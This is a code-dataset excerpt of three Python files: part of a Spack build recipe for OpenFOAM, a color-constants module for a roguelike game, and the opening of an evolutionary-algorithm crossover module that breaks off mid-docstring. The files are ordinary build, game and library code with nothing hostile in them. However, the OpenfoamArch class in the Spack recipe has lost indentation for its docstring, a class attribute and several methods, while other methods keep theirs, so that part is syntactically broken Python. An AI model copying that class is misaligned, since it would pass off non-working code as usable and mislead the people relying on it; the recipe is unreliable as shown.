        'FLAGS': '-DOMPI_SKIP_MPICXX -DMPICH_SKIP_MPICXX',
        'PINC': '-I{0}'.format(inc_dir),
        'PLIBS': '-L{0} -l{1}'.format(lib_dir, libname),
    }
# -----------------------------------------------------------------------------
class OpenfoamCom(Package):
    """OpenFOAM is a GPL-opensource C++ CFD-toolbox.
    This offering is supported by OpenCFD Ltd,
    producer and distributor of the OpenFOAM software via www.openfoam.com,
    and owner of the OPENFOAM trademark.
    OpenCFD Ltd has been developing and releasing OpenFOAM since its debut
    in 2004.
    """

    maintainers = ['olesenm']
    homepage = "http://www.openfoam.com/"
    gitrepo = "https://develop.openfoam.com/Development/OpenFOAM-plus.git"
    url = "https://sourceforge.net/projects/openfoamplus/files/v1706/OpenFOAM-v1706.tgz"
    list_url = "https://sourceforge.net/projects/openfoamplus/files/"
    list_depth = 2

    version('1806', 'bb244a3bde7048a03edfccffc46c763f')
    version('1712', '6ad92df051f4d52c7d0ec34f4b8eb3bc')
    version('1706', '630d30770f7b54d6809efbf94b7d7c8f')
    version('1612', 'ca02c491369150ab127cbb88ec60fbdf')
    version('develop', branch='develop', git=gitrepo, submodules='True')  # Needs credentials

    variant('float32', default=False,
            description='Use single-precision')
    variant('int64', default=False,
            description='With 64-bit labels')
    variant('knl', default=False,
            description='Use KNL compiler settings')
    variant('kahip', default=True,
            description='With kahip decomposition')
    variant('metis', default=False,
            description='With metis decomposition')
    variant('scotch', default=True,
            description='With scotch/ptscotch decomposition')
    variant('zoltan', default=False,
            description='With zoltan renumbering')
    # TODO?# variant('scalasca', default=False,
    # TODO?#         description='With scalasca profiling')
    variant('mgridgen', default=False, description='With mgridgen support')
    variant('paraview', default=False,
            description='Build paraview plugins and runtime post-processing')
    variant('vtk', default=False,
            description='With VTK runTimePostProcessing')
    variant('source', default=True,
            description='Install library/application sources and tutorials')

    provides('openfoam')
    depends_on('mpi')
    # After 1712, could suggest openmpi+thread_multiple for collated output
    # but particular mixes of mpi versions and InfiniBand may not work so well
    # conflicts('^openmpi~thread_multiple', when='@1712:')
    depends_on('zlib')
    depends_on('fftw')
    depends_on('boost')
    depends_on('cgal')
    # The flex restriction is ONLY to deal with a spec resolution clash
    # introduced by the restriction within scotch!
    depends_on('flex@:2.6.1,2.6.4:', type='build')
    depends_on('cmake', type='build')

    # Require scotch with ptscotch - corresponds to standard OpenFOAM setup
    depends_on('scotch~metis+mpi~int64', when='+scotch~int64')
    depends_on('scotch~metis+mpi+int64', when='+scotch+int64')
    depends_on('kahip', when='+kahip')
    depends_on('metis@5:', when='+metis')
    depends_on('metis+int64', when='+metis+int64')
    # mgridgen is statically linked
    depends_on('parmgridgen', when='+mgridgen', type='build')
    depends_on('zoltan', when='+zoltan')
    depends_on('vtk', when='+vtk')
    # TODO?# depends_on('scalasca', when='+scalasca')

    # For OpenFOAM plugins and run-time post-processing this should just be
    # 'paraview+plugins' but that resolves poorly.
    # Workaround: use preferred variants "+plugins +qt" in
    # ~/.spack/packages.yaml
    # 1706 ok with newer paraview but avoid pv-5.2, pv-5.3 readers
    depends_on('paraview@5.4:', when='@1706:+paraview')
    # 1612 plugins need older paraview
    depends_on('paraview@:5.0.1', when='@1612+paraview')

    # General patches
    common = ['spack-Allwmake', 'README-spack']
    assets = []

    # Version-specific patches
    patch('1612-spack-patches.patch', when='@1612')

    # Some user config settings
    # default: 'compile-option': 'RpathOpt',
    # default: 'mplib': 'USERMPI',  # Use user mpi for spack
    config = {
        # Add links into bin/, lib/ (eg, for other applications)
        'link': False
    }

    # The openfoam architecture, compiler information etc
    _foam_arch = None

    # Content for etc/prefs.{csh,sh}
    etc_prefs = {}

    # Content for etc/config.{csh,sh}/ files
    etc_config = {}

    phases = ['configure', 'build', 'install']
    build_script = './spack-Allwmake'  # From patch() method.
    #
    # - End of definitions / setup -
    #

    def url_for_version(self, version):
        """Return the download URL for a given version.

        Prior to 'v1706' an additional '+' appears in the naming.
        """
        fmt = self.list_url
        if version <= Version('1612'):
            fmt += 'v{0}+/OpenFOAM-v{0}+.tgz'
        else:
            fmt += 'v{0}/OpenFOAM-v{0}.tgz'
        return fmt.format(version, version)

    def setup_environment(self, spack_env, run_env):
        """Add environment variables to the generated module file.

        These environment variables come from running:

        .. code-block:: console

           $ . $WM_PROJECT_DIR/etc/bashrc
        """
        # NOTE: Spack runs setup_environment twice.
        # 1) pre-build to set up the build environment
        # 2) post-install to determine runtime environment variables
        # The etc/bashrc is only available (with correct content)
        # post-installation.
        bashrc = join_path(self.projectdir, 'etc', 'bashrc')
        minimal = True
        if os.path.isfile(bashrc):
            # post-install: source the installed bashrc
            try:
                mods = EnvironmentModifications.from_sourcing_file(
                    bashrc,
                    clean=True,  # Remove duplicate entries
                    blacklist=[  # Blacklist these
                        # Inadvertent changes
                        # -------------------
                        'PS1',            # Leave unaffected
                        'MANPATH',        # Leave unaffected
                        # Unneeded bits
                        # -------------
                        'FOAM_SETTINGS',  # Do not use with modules
                        'FOAM_INST_DIR',  # Old
                        'FOAM_(APP|ETC|SRC|SOLVERS|UTILITIES)',
                        # 'FOAM_TUTORIALS',  # can be useful
                        'WM_OSTYPE',      # Purely optional value
                        # Third-party cruft - only used for orig compilation
                        # -----------------
                        '[A-Z].*_ARCH_PATH',
                        '(KAHIP|METIS|SCOTCH)_VERSION',
                        # User-specific
                        # -------------
                        'FOAM_RUN',
                        '(FOAM|WM)_.*USER_.*',
                    ],
                    whitelist=[  # Whitelist these
                        'MPI_ARCH_PATH',  # Can be needed for compilation
                    ])
                run_env.extend(mods)
                minimal = False
                tty.info('OpenFOAM bashrc env: {0}'.format(bashrc))
            except Exception:
                minimal = True
        if minimal:
            # pre-build or minimal environment
            tty.info('OpenFOAM minimal env {0}'.format(self.prefix))
            run_env.set('FOAM_PROJECT_DIR', self.projectdir)
            run_env.set('WM_PROJECT_DIR', self.projectdir)
            for d in ['wmake', self.archbin]:  # bin added automatically
                run_env.prepend_path('PATH', join_path(self.projectdir, d))

    def setup_dependent_environment(self, spack_env, run_env, dependent_spec):
        """Location of the OpenFOAM project directory.
        This is identical to the WM_PROJECT_DIR value, but we avoid that
        variable since it would mask the normal OpenFOAM cleanup of
        previous versions.
        """
        spack_env.set('FOAM_PROJECT_DIR', self.projectdir)

    @property
    def projectdir(self):
        """Absolute location of project directory: WM_PROJECT_DIR/"""
        return self.prefix  # <- install directly under prefix

    @property
    def foam_arch(self):
        """Lazily constructed OpenfoamArch for this spec."""
        if not self._foam_arch:
            self._foam_arch = OpenfoamArch(self.spec, **self.config)
        return self._foam_arch

    @property
    def archbin(self):
        """Relative location of architecture-specific executables"""
        return join_path('platforms', self.foam_arch, 'bin')

    @property
    def archlib(self):
        """Relative location of architecture-specific libraries"""
        return join_path('platforms', self.foam_arch, 'lib')

    def patch(self):
        """Adjust OpenFOAM build for spack.
        Where needed, apply filter as an alternative to normal patching."""
        add_extra_files(self, self.common, self.assets)
        # Avoid WM_PROJECT_INST_DIR for ThirdParty, site or jobControl.
        #
        # Filtering: bashrc,cshrc (using a patch is less flexible)
        edits = {
            'WM_THIRD_PARTY_DIR':
                r'$WM_PROJECT_DIR/ThirdParty #SPACK: No separate third-party',
        }
        rewrite_environ_files(  # etc/{bashrc,cshrc}
            edits,
            posix=join_path('etc', 'bashrc'),
            cshell=join_path('etc', 'cshrc'))
        # Filtering: settings
        edits = {
            'FOAM_EXT_LIBBIN': '#SPACK: No separate third-party',  # ie, unset
        }
        rewrite_environ_files(  # etc/config.{csh,sh}/settings
            edits,
            posix=join_path('etc', 'config.sh', 'settings'),
            cshell=join_path('etc', 'config.csh', 'settings'))
        # The following filtering is non-vital. It simply prevents 'site' dirs
        # from the wrong level (likely non-existent anyhow) from being
        # added to PATH, LD_LIBRARY_PATH.
        for rcdir in ['config.sh', 'config.csh']:
            rcfile = join_path('etc', rcdir, 'settings')
            if os.path.isfile(rcfile):
                filter_file(
                    'WM_PROJECT_INST_DIR/',
                    'WM_PROJECT_DIR/',
                    rcfile,
                    backup=False)

    def configure(self, spec, prefix):
        """Make adjustments to the OpenFOAM configuration files in their
        various locations: etc/bashrc, etc/config.sh/FEATURE and
        customizations that don't properly fit get placed in the
        etc/prefs.sh file (similarly for csh).
        """
        # Filtering bashrc, cshrc
        edits = {}
        edits.update(self.foam_arch.foam_dict())
        rewrite_environ_files(  # etc/{bashrc,cshrc}
            edits,
            posix=join_path('etc', 'bashrc'),
            cshell=join_path('etc', 'cshrc'))
        # Content for etc/prefs.{csh,sh}
        self.etc_prefs = {
            # TODO
            # 'CMAKE_ARCH_PATH': spec['cmake'].prefix,
            # 'FLEX_ARCH_PATH': spec['flex'].prefix,
            # 'ZLIB_ARCH_PATH': spec['zlib'].prefix,
        }
        # MPI content, using MPI_ARCH_PATH
        user_mpi = mplib_content(spec, '${MPI_ARCH_PATH}')
        # Content for etc/config.{csh,sh}/ files
        self.etc_config = {
            'CGAL': [
                ('BOOST_ARCH_PATH', spec['boost'].prefix),
                ('CGAL_ARCH_PATH', spec['cgal'].prefix),
                ('LD_LIBRARY_PATH',
                 foamAddLib(
                     pkglib(spec['boost'], '${BOOST_ARCH_PATH}'),
                     pkglib(spec['cgal'], '${CGAL_ARCH_PATH}'))),
            ],
            'FFTW': [
                ('FFTW_ARCH_PATH', spec['fftw'].prefix),  # Absolute
                ('LD_LIBRARY_PATH',
                 foamAddLib(
                     # FIX: was '${BOOST_ARCH_PATH}' (copy-paste error),
                     # which pointed the fftw rpath at the boost prefix.
                     pkglib(spec['fftw'], '${FFTW_ARCH_PATH}'))),
            ],
            # User-defined MPI
            'mpi-user': [
                ('MPI_ARCH_PATH', spec['mpi'].prefix),  # Absolute
                ('LD_LIBRARY_PATH', foamAddLib(user_mpi['libdir'])),
                ('PATH', foamAddPath(user_mpi['bindir'])),
            ],
            'scotch': {},
            'kahip': {},
            'metis': {},
            'ensight': {},     # Disable settings
            'paraview': [],
            'gperftools': [],  # Currently unused
            'vtk': [],
        }
        if '+scotch' in spec:
            self.etc_config['scotch'] = {
                'SCOTCH_ARCH_PATH': spec['scotch'].prefix,
                # For src/parallel/decompose/Allwmake
                'SCOTCH_VERSION': 'scotch-{0}'.format(spec['scotch'].version),
            }
        if '+kahip' in spec:
            self.etc_config['kahip'] = {
                'KAHIP_ARCH_PATH': spec['kahip'].prefix,
            }
        if '+metis' in spec:
            self.etc_config['metis'] = {
                'METIS_ARCH_PATH': spec['metis'].prefix,
            }
        if '+paraview' in spec:
            pvMajor = 'paraview-{0}'.format(spec['paraview'].version.up_to(2))
            self.etc_config['paraview'] = [
                ('ParaView_DIR', spec['paraview'].prefix),
                ('ParaView_INCLUDE_DIR', '${ParaView_DIR}/include/' + pvMajor),
                ('PV_PLUGIN_PATH', '$FOAM_LIBBIN/' + pvMajor),
                ('PATH', foamAddPath('${ParaView_DIR}/bin')),
            ]
        if '+vtk' in spec:
            self.etc_config['vtk'] = [
                ('VTK_DIR', spec['vtk'].prefix),
                ('LD_LIBRARY_PATH',
                 foamAddLib(pkglib(spec['vtk'], '${VTK_DIR}'))),
            ]
        # Optional
        if '+mgridgen' in spec:
            self.etc_config['mgridgen'] = {
                'MGRIDGEN_ARCH_PATH': spec['parmgridgen'].prefix
            }
        # Optional
        if '+zoltan' in spec:
            self.etc_config['zoltan'] = {
                'ZOLTAN_ARCH_PATH': spec['zoltan'].prefix
            }
        # Write prefs files according to the configuration.
        # Only need prefs.sh for building, but install both for end-users
        if self.etc_prefs:
            write_environ(
                self.etc_prefs,
                posix=join_path('etc', 'prefs.sh'),
                cshell=join_path('etc', 'prefs.csh'))
        # Adjust components to use SPACK variants
        for component, subdict in self.etc_config.items():
            write_environ(
                subdict,
                posix=join_path('etc', 'config.sh', component),
                cshell=join_path('etc', 'config.csh', component))

    def build(self, spec, prefix):
        """Build using the OpenFOAM Allwmake script, with a wrapper to source
        its environment first.
        Only build if the compiler is known to be supported.
        """
        self.foam_arch.has_rule(self.stage.source_path)
        self.foam_arch.create_rules(self.stage.source_path, self)
        args = ['-silent']
        if self.parallel:  # Build in parallel? - pass as an argument
            args.append('-j{0}'.format(make_jobs))
        builder = Executable(self.build_script)
        builder(*args)

    def install(self, spec, prefix):
        """Install under the projectdir"""
        mkdirp(self.projectdir)
        projdir = os.path.basename(self.projectdir)
        # Filtering: bashrc, cshrc
        edits = {
            'WM_PROJECT_INST_DIR': os.path.dirname(self.projectdir),
            'WM_PROJECT_DIR': join_path('$WM_PROJECT_INST_DIR', projdir),
        }
        # All top-level files, except spack build info and possibly Allwmake
        if '+source' in spec:
            ignored = re.compile(r'^spack-.*')
        else:
            ignored = re.compile(r'^(Allwmake|spack-).*')
        files = [
            f for f in glob.glob("*")
            if os.path.isfile(f) and not ignored.search(f)
        ]
        for f in files:
            install(f, self.projectdir)
        # Having wmake and ~source is actually somewhat pointless...
        # Install 'etc' before 'bin' (for symlinks)
        dirs = ['etc', 'bin', 'wmake']
        if '+source' in spec:
            dirs.extend(['applications', 'src', 'tutorials'])
        for d in dirs:
            install_tree(
                d,
                join_path(self.projectdir, d),
                symlinks=True)
        dirs = ['platforms']
        if '+source' in spec:
            dirs.extend(['doc'])
        # Install platforms (and doc) skipping intermediate targets
        ignored = ['src', 'applications', 'html', 'Guides']
        for d in dirs:
            install_tree(
                d,
                join_path(self.projectdir, d),
                ignore=shutil.ignore_patterns(*ignored),
                symlinks=True)
        etc_dir = join_path(self.projectdir, 'etc')
        rewrite_environ_files(  # Adjust etc/bashrc and etc/cshrc
            edits,
            posix=join_path(etc_dir, 'bashrc'),
            cshell=join_path(etc_dir, 'cshrc'))
        self.install_links()

    def install_links(self):
        """Add symlinks into bin/, lib/ (eg, for other applications)"""
        # Make build log visible - it contains OpenFOAM-specific information
        with working_dir(self.projectdir):
            os.symlink(
                join_path('.spack', 'build.out'),
                join_path('log.' + str(self.foam_arch)))
        if not self.config['link']:
            return
        # ln -s platforms/linux64GccXXX/lib lib
        with working_dir(self.projectdir):
            if os.path.isdir(self.archlib):
                os.symlink(self.archlib, 'lib')
        # (cd bin && ln -s ../platforms/linux64GccXXX/bin/* .)
        with working_dir(join_path(self.projectdir, 'bin')):
            for f in [
                f for f in glob.glob(join_path('..', self.archbin, "*"))
                if os.path.isfile(f)
            ]:
                os.symlink(f, os.path.basename(f))
# -----------------------------------------------------------------------------
class OpenfoamArch(object):
"""OpenfoamArch represents architecture/compiler settings for OpenFOAM.
The string representation is WM_OPTIONS.
Keywords
label-size=[True] supports int32/int64
compile-option[=RpathOpt]
mplib[=USERMPI]
"""
#: Map spack compiler names to OpenFOAM compiler names
# By default, simply capitalize the first letter
compiler_mapping = {'intel': 'icc'}
    def __init__(self, spec, **kwargs):
        """Derive architecture/compiler settings from a spack spec.

        Keyword Options:
            compile-option[='RpathOpt']
            mplib[='USERMPI']
            label-size[=True]   enable WM_LABEL_SIZE handling (int32/int64)
        """
        # Some user settings, to be adjusted manually or via variants
        self.compiler = None          # <- %compiler
        self.arch_option = '64'       # (32/64-bit on x86_64)
        self.label_size = None        # <- +int64
        self.precision_option = 'DP'  # <- +float32
        self.compile_option = kwargs.get('compile-option', 'RpathOpt')
        self.arch = None
        self.options = None
        self.rule = None
        self.mplib = kwargs.get('mplib', 'USERMPI')
        # Normally support WM_LABEL_OPTION, but not yet for foam-extend
        if '+int64' in spec:
            self.label_size = '64'
        elif kwargs.get('label-size', True):
            self.label_size = '32'
        if '+float32' in spec:
            self.precision_option = 'SP'
        # spec.architecture.platform is like `uname -s`, but lower-case
        platform = spec.architecture.platform
        # spec.architecture.target is like `uname -m`
        target = spec.architecture.target
        # Map (platform, target) onto the OpenFOAM WM_ARCH naming scheme,
        # e.g. 'linux64', 'linuxARM64', 'darwinIntel64'.
        if platform == 'linux':
            if target == 'i686':
                self.arch_option = '32'  # Force consistency
            elif target == 'x86_64':
                if self.arch_option == '64':
                    platform += '64'
            elif target == 'ia64':
                platform += 'ia64'
            elif target == 'armv7l':
                platform += 'ARM7'
            elif target == 'aarch64':
                platform += 'ARM64'
            elif target == 'ppc64':
                platform += 'PPC64'
            elif target == 'ppc64le':
                platform += 'PPC64le'
        elif platform == 'darwin':
            if target == 'x86_64':
                platform += 'Intel'
                if self.arch_option == '64':
                    platform += '64'
        # ... and others?
        self.arch = platform
        # Capitalized version of the compiler name, which usually corresponds
        # to how OpenFOAM will camel-case things.
        # Use compiler_mapping to handle special cases.
        # Also handle special compiler options (eg, KNL)
        comp = spec.compiler.name
        if comp in self.compiler_mapping:
            comp = self.compiler_mapping[comp]
        comp = comp.capitalize()
        if '+knl' in spec:
            comp += 'KNL'
        self.compiler = comp
        self.rule = self.arch + self.compiler
        # Build WM_OPTIONS
        # ----
        # WM_LABEL_OPTION=Int$WM_LABEL_SIZE
        # WM_OPTIONS=$WM_ARCH$WM_COMPILER$WM_PRECISION_OPTION$WM_LABEL_OPTION$WM_COMPILE_OPTION
        # or
        # WM_OPTIONS=$WM_ARCH$WM_COMPILER$WM_PRECISION_OPTION$WM_COMPILE_OPTION
        # ----
        self.options = ''.join([
            self.rule,
            self.precision_option,
            ('Int' + self.label_size if self.label_size else ''),
            self.compile_option])
def __str__(self):
return self.options
def __repr__(self):
return str(self)
def foam_dict(self):
    """Returns a dictionary for OpenFOAM prefs, bashrc, cshrc."""
    # Plain dict literal; insertion order matches the original listing.
    return {
        'WM_COMPILER': self.compiler,
        'WM_ARCH_OPTION': self.arch_option,
        'WM_LABEL_SIZE': self.label_size,
        'WM_PRECISION_OPTION': self.precision_option,
        'WM_COMPILE_OPTION': self.compile_option,
        'WM_MPLIB': self.mplib,
    }
def _rule_directory(self, projdir=None, general=False):
"""The wmake/rules/ compiler directory"""
if general:
relative = os.path.join('wmake', 'rules', 'General')
else:
relative = os.path.join('wmake', 'rules', self.rule)
if projdir:
return os.path.join(projdir, relative)
else:
return relative
def has_rule(self, projdir):
    """Verify that a wmake/rules/ compiler rule exists in the project
    directory, and that the compile option is an '*Opt' type.
    """
    # Without a rule directory this architecture/compiler combination
    # cannot be built at all.
    rule_dir = self._rule_directory(projdir)
    if not os.path.isdir(rule_dir):
        raise InstallError(
            'No wmake rule for {0}'.format(self.rule))
    # Only '*Opt' compile options are supported (rules are derived
    # from the corresponding cOpt/c++Opt files).
    if re.match(r'.+Opt$', self.compile_option) is None:
        raise InstallError(
            "WM_COMPILE_OPTION={0} is not type '*Opt'"
            .format(self.compile_option))
    return True
def create_rules(self, projdir, foam_pkg):
    """ Create cRpathOpt,c++RpathOpt and mplibUSER,mplibUSERMPI
    rules in the specified project directory.
    The compiler rules are based on the respective cOpt,c++Opt rules
    but with additional rpath information for the OpenFOAM libraries.

    The rpath rules allow wmake to use spack information with minimal
    modification to OpenFOAM.
    The rpath is used for the installed libpath (continue to use
    LD_LIBRARY_PATH for values during the build).
    """
    # Note: the 'c' rules normally don't need rpath, since they are just
    # used for statically linked wmake utilities, but left in anyhow.

    # rpath for installed OpenFOAM libraries, e.g. "-Wl,-rpath,<libdir>"
    # (cxx_rpath_arg already carries the compiler-specific flag prefix).
    rpath = '{0}{1}'.format(
        foam_pkg.compiler.cxx_rpath_arg,
        join_path(foam_pkg.projectdir, foam_pkg.archlib))

    # Dict of MPI settings ({name}, {FLAGS}, {PINC}, {PLIBS}) derived
    # from the spec's MPI provider -- used to fill the mplib templates.
    user_mpi = mplib_content(foam_pkg.spec)
    rule_dir = self._rule_directory(projdir)

    with working_dir(rule_dir):
        # Compiler: copy existing cOpt,c++Opt and modify '*DBUG' value
        # by appending the rpath to the line.
        for lang in ['c', 'c++']:
            src = '{0}Opt'.format(lang)
            dst = '{0}{1}'.format(lang, self.compile_option)
            with open(src, 'r') as infile:
                with open(dst, 'w') as outfile:
                    for line in infile:
                        line = line.rstrip()
                        outfile.write(line)
                        # Lines like "cDBUG =" / "c++DBUG =" get the
                        # rpath appended; all lines keep their newline.
                        if re.match(r'^\S+DBUG\s*=', line):
                            outfile.write(' ')
                            outfile.write(rpath)
                        outfile.write('\n')

        # MPI rules: write mplibUSER / mplibUSERMPI templates filled
        # with the spack-provided MPI flags.
        for mplib in ['mplibUSER', 'mplibUSERMPI']:
            with open(mplib, 'w') as out:
                out.write("""# Use mpi from spack ({name})\n
PFLAGS = {FLAGS}
PINC = {PINC}
PLIBS = {PLIBS}
""".format(**user_mpi))
# -----------------------------------------------------------------------------
| matthiasdiener/spack | var/spack/repos/builtin/packages/openfoam-com/package.py | Python | lgpl-2.1 | 34,061 | [
"ParaView",
"VTK"
] | 601a4c3f2eaa263d6a49efa80807c5a48af7edb3402abc3f54f862827a9afb27 |
# -*- coding: utf-8 -*-
"""Color constants and a getter function."""
def get(color_name):
    """Return the color spec mapped to *color_name*, or 'white'.

    Unknown names (and names mapping to a falsy value) fall back to
    'white' so callers always receive a usable color string.
    """
    # dict.get plus `or` keeps the original falsy-value fallback in one step.
    return _COLORS.get(color_name) or 'white'
# converting color name to color code here couldn't change the color
# converting in render_all() works, I don't know why though
# hue may be specified in a number of ways:
# 'dark orange', '#RRGGBB' or '#AARRGGBB', 'R,G,B' or 'A,R,G,B'
# Symbolic game color names -> color specs.  A value is either a library
# color-name string (e.g. 'dark orange') or an 'R,G,B' component string,
# per the format note above.
_COLORS = {
    'light_wall': 'orange',  # R,G,B
    'dark_wall': 'dark orange',
    'darker_wall': 'darker orange',
    'light_ground': 'dark amber',
    'dark_ground': 'darker amber',
    'darker_ground': 'darkest amber',
    'desaturated_green': '63,127,63',
    'darker_green': '0,127,0',
    'dark_red': '191,0,0',
    'white': '255,255,255',
    'black': '0,0,0',
    'red': '255,0,0',
    'orange': '255,127,0',
    'light_red': '255,114,114',
    'darker_red': '127,0,0',
    'system_msg': 'light green',
    'violet': '127,0,255',
    # NOTE(review): 'yellow' and 'light_violet' contain spaces after the
    # commas, unlike every other 'R,G,B' entry -- confirm the consumer
    # tolerates spaces before normalizing.
    'yellow': '255, 255, 0',
    'blue': '0,0,255',
    'green': '0,255,0',
    'light_cyan': '114,255,255',
    'light_pink': '255,114,184',
    'inventory_msg': 'light cyan',
    'light_violet': '184, 114, 255',
    # UI bar colors: filled / empty portions of each gauge.
    'health': 'dark red',
    'health_empty': 'darkest red',
    'stamina': 'dark amber',
    'stamina_empty': 'darkest amber',
    'luck': 'dark sea',
    'luck_empty': 'darkest sea',
    'exp': 'blue',
    'exp_empty': 'darker blue',
}
| kuraha4/roguelike-tutorial-python | src/colors.py | Python | mit | 1,464 | [
"Amber"
] | e0a8576a7dd8744caa48a2226a42b72dd4fbd04537eaa8001f92d7b3ddf490e9 |
"""
=================
:mod:`crossovers`
=================
.. Copyright 2012 Inspired Intelligence Initiative
.. This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
.. This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
.. You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
.. module:: crossovers
.. moduleauthor:: Aaron Garrett <aaron.lee.garrett@gmail.com>
"""
import copy
import functools
import math
try:
import cPickle as pickle
except ImportError:
import pickle
def crossover(cross):
    """Return an inspyred-compatible crossover built from *cross*.

    *cross* operates on a single (mom, dad) pair of parents and returns
    an iterable of offspring.  The wrapper pairs up the selected parents
    -- candidates at even positions become moms, odd positions dads,
    dropping a trailing unpaired candidate -- and concatenates all the
    offspring produced.  Before each pair is crossed, ``cross.index`` is
    set to the pair's index.

    The required signature of *cross* is::

        offspring = cross(random, mom, dad, args)

    This generator is most commonly used as a decorator.  The original
    pairwise function remains reachable through the ``single_crossover``
    attribute of the returned function.
    """
    @functools.wraps(cross)
    def paired_crossover(random, candidates, args):
        parents = candidates if len(candidates) % 2 == 0 else candidates[:-1]
        offspring = []
        for idx, (mom, dad) in enumerate(zip(parents[::2], parents[1::2])):
            cross.index = idx
            offspring.extend(cross(random, mom, dad, args))
        return offspring
    paired_crossover.single_crossover = cross
    return paired_crossover
@crossover
def n_point_crossover(random, mom, dad, args):
    """Return the offspring of n-point crossover on the candidates.

    Cuts both parents at the same *n* randomly chosen positions
    (sampled without replacement) and swaps the alternating segments
    to build two children.

    .. Arguments:
       random -- the random number generator object
       mom -- the first parent candidate
       dad -- the second parent candidate
       args -- a dictionary of keyword arguments

    Optional keyword arguments in args:

    - *crossover_rate* -- the rate at which crossover is performed
      (default 1.0)
    - *num_crossover_points* -- the number of crossover points used (default 1)
    """
    rate = args.setdefault('crossover_rate', 1.0)
    num_points = args.setdefault('num_crossover_points', 1)
    if random.random() >= rate:
        return [mom, dad]
    # Cannot cut more times than there are gaps between genes.
    num_cuts = min(len(mom) - 1, num_points)
    cuts = sorted(random.sample(range(1, len(mom)), num_cuts))
    bro, sis = copy.copy(dad), copy.copy(mom)
    swapping = False
    for pos, (m_gene, d_gene) in enumerate(zip(mom, dad)):
        if pos in cuts:
            swapping = not swapping
        if swapping:
            bro[pos] = m_gene
            sis[pos] = d_gene
    return [bro, sis]
@crossover
def uniform_crossover(random, mom, dad, args):
    """Return the offspring of uniform crossover on the candidates.

    For every gene position a biased coin is flipped; on success the
    pair of children swap that position's alleles.

    .. Arguments:
       random -- the random number generator object
       mom -- the first parent candidate
       dad -- the second parent candidate
       args -- a dictionary of keyword arguments

    Optional keyword arguments in args:

    - *crossover_rate* -- the rate at which crossover is performed
      (default 1.0)
    - *ux_bias* -- the bias toward the first candidate in the crossover
      (default 0.5)
    """
    bias = args.setdefault('ux_bias', 0.5)
    rate = args.setdefault('crossover_rate', 1.0)
    if random.random() >= rate:
        return [mom, dad]
    bro, sis = copy.copy(dad), copy.copy(mom)
    for pos, (m_gene, d_gene) in enumerate(zip(mom, dad)):
        if random.random() < bias:
            bro[pos] = m_gene
            sis[pos] = d_gene
    return [bro, sis]
@crossover
def partially_matched_crossover(random, mom, dad, args):
    """Return the offspring of partially matched crossover on the candidates.

    This function performs partially matched crossover (PMX). This type of
    crossover assumes that candidates are composed of discrete values that
    are permutations of a given set (typically integers). It produces offspring
    that are themselves permutations of the set.

    .. Arguments:
       random -- the random number generator object
       mom -- the first parent candidate
       dad -- the second parent candidate
       args -- a dictionary of keyword arguments

    Optional keyword arguments in args:

    - *crossover_rate* -- the rate at which crossover is performed
      (default 1.0)
    """
    crossover_rate = args.setdefault('crossover_rate', 1.0)
    if random.random() < crossover_rate:
        size = len(mom)
        # Pick a random segment [x, y] (two distinct cut indices).
        points = random.sample(range(size), 2)
        x, y = min(points), max(points)
        # Each child takes the segment from the other parent...
        bro = copy.copy(dad)
        bro[x:y+1] = mom[x:y+1]
        sis = copy.copy(mom)
        sis[x:y+1] = dad[x:y+1]
        # ...then values displaced by the segment are repaired so each
        # child remains a permutation: follow the mapping chain until a
        # slot outside the copied segment is found.
        for parent, child in zip([dad, mom], [bro, sis]):
            for i in range(x, y+1):
                if parent[i] not in child[x:y+1]:
                    spot = i
                    while x <= spot <= y:
                        spot = parent.index(child[spot])
                    child[spot] = parent[i]
        return [bro, sis]
    else:
        # No crossover: parents pass through unchanged.
        return [mom, dad]
@crossover
def arithmetic_crossover(random, mom, dad, args):
    """Return the offspring of arithmetic crossover on the candidates.

    Each recombined allele is the weighted average
    ``alpha * a + (1 - alpha) * b`` of the parents' alleles.  Only the
    positions listed in *ax_points* are recombined; by default every
    position is, so default settings produce simple averages of the
    parents.  Offspring are passed through the EC's bounder.

    .. Arguments:
       random -- the random number generator object
       mom -- the first parent candidate
       dad -- the second parent candidate
       args -- a dictionary of keyword arguments

    Optional keyword arguments in args:

    - *crossover_rate* -- the rate at which crossover is performed
      (default 1.0)
    - *ax_alpha* -- the weight for the averaging (default 0.5)
    - *ax_points* -- a list of points specifying the alleles to
      recombine (default None)
    """
    alpha = args.setdefault('ax_alpha', 0.5)
    points = args.setdefault('ax_points', None)
    rate = args.setdefault('crossover_rate', 1.0)
    bounder = args['_ec'].bounder
    if random.random() >= rate:
        return [mom, dad]
    bro, sis = copy.copy(dad), copy.copy(mom)
    if points is None:
        points = list(range(min(len(bro), len(sis))))
    for pos in points:
        bro[pos] = alpha * mom[pos] + (1 - alpha) * dad[pos]
        sis[pos] = alpha * dad[pos] + (1 - alpha) * mom[pos]
    return [bounder(bro, args), bounder(sis, args)]
@crossover
def blend_crossover(random, mom, dad, args):
    """Return the offspring of blend crossover on the candidates.

    Performs blend crossover (BLX): each recombined allele is drawn
    uniformly from the interval spanned by the parents' alleles,
    widened on both sides by *blx_alpha* times the interval length --
    the widening provides additional exploration.  Only the positions
    listed in *blx_points* are recombined (default: all).  Offspring
    are passed through the EC's bounder.

    .. Arguments:
       random -- the random number generator object
       mom -- the first parent candidate
       dad -- the second parent candidate
       args -- a dictionary of keyword arguments

    Optional keyword arguments in args:

    - *crossover_rate* -- the rate at which crossover is performed
      (default 1.0)
    - *blx_alpha* -- the blending rate (default 0.1)
    - *blx_points* -- a list of points specifying the alleles to
      recombine (default None)
    """
    alpha = args.setdefault('blx_alpha', 0.1)
    points = args.setdefault('blx_points', None)
    rate = args.setdefault('crossover_rate', 1.0)
    bounder = args['_ec'].bounder
    if random.random() >= rate:
        return [mom, dad]
    bro, sis = copy.copy(dad), copy.copy(mom)
    if points is None:
        points = list(range(min(len(bro), len(sis))))
    for pos in points:
        lo, hi = min(mom[pos], dad[pos]), max(mom[pos], dad[pos])
        delta = alpha * (hi - lo)
        span = hi - lo + 2 * delta
        bro[pos] = lo - delta + random.random() * span
        sis[pos] = lo - delta + random.random() * span
    return [bounder(bro, args), bounder(sis, args)]
def heuristic_crossover(random, candidates, args):
    """Return the offspring of heuristic crossover on the candidates.

    It performs heuristic crossover (HX), which is similar to the
